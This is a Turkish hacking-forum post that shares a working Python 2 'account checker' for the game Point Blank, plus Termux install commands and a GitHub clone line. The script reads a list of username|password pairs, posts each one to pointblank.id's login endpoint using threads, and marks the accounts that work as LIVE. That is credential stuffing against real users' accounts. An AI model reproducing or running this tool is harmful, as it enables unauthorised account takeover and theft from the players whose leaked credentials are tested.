Point Blank Account Checker

EsatOfficial

MT Üye
MT Üye
Mesaj
184
Beğeni
112
Puan
706
Ticaret Puanı
0
Merhaba Arkadaslar bu Konuda Point Blank Account Checker Kodunu
Paylasıyorum Python Bazlıdır Android + PC de python yuklersenız calısmaktadır


Python:
# coding: UTF-8
import requests, os, sys
from multiprocessing.pool import ThreadPool

P = '\x1b[1;97m'
H = '\x1b[1;92m'
M = '\x1b[1;91m'
B = '\x1b[1;94m'

logo = """
%s        ╔═╗╔╗    ╔═╗%s┌─┐┌─┐┌─┐┌┬┐┌┬┐┌─┐
%s        ╠═╝╠╩╗%s───%s╔═╝%s├┤ ├─┘├┤  │  │ │ │
%s        ╩  ╚═╝   ╚═╝%s└─┘┴  └─┘ ┴  ┴ └─┘
%s    +------------------------------------+
%s             PB ZEPETTO CHECKER
%s    +------------------------------------+
"""%(M,H,M,P,M,H,M,H,M,P,M)

def brute(akun):
    try:
        run = requests.post('https://www.pointblank.id/login/process',data={'loginFail':'0','userid':akun.split('|')[0],'password':akun.split('|')[1]}).text
        if 'tidak sesuai' in run:
            print "\x1b[1;97m[ \x1b[1;91mDIEE \x1b[1;97m]=> \x1b[1;91m"+ akun
        elif 'kegagalan login' in run:
            print "\x1b[1;97m[ \x1b[1;91mDIEE \x1b[1;97m]=> \x1b[1;91m"+ akun
        else:
            print "\x1b[1;97m[ \x1b[1;92mLIVE \x1b[1;97m]=> \x1b[1;92m"+ akun
    except requests.exceptions.ConnectionError:
        exit('%s[%s×%s] %sNo Connection'%(P,M,P,M))

if __name__=="__main__":
   os.system('clear')
   print logo
   list = raw_input('%s[%s•%s] List Account %s:%s '%(P,H,P,M,H))
   try:
       em = open(list, 'r').readlines()
       en = open(list, 'r').read().splitlines()
   except IOError:
       exit('%s[%s×%s] %sList Not Found'%(P,M,P,M))
   print "%s[%s=%s] Total Account %s:%s %s"%(P,H,P,M,H,str(len(em)))
   print ""
   ThreadPool(2).map(brute,en)


Bash:
pkg update && pkg upgrade
pkg install python2
pkg install git
pip2 install requests
git clone https://github.com/hekelpro/PB-Checker
cd PB-Checker
python2 pb.py
 
En son bir moderatör tarafından düzenlenmiş:
Geri
Üst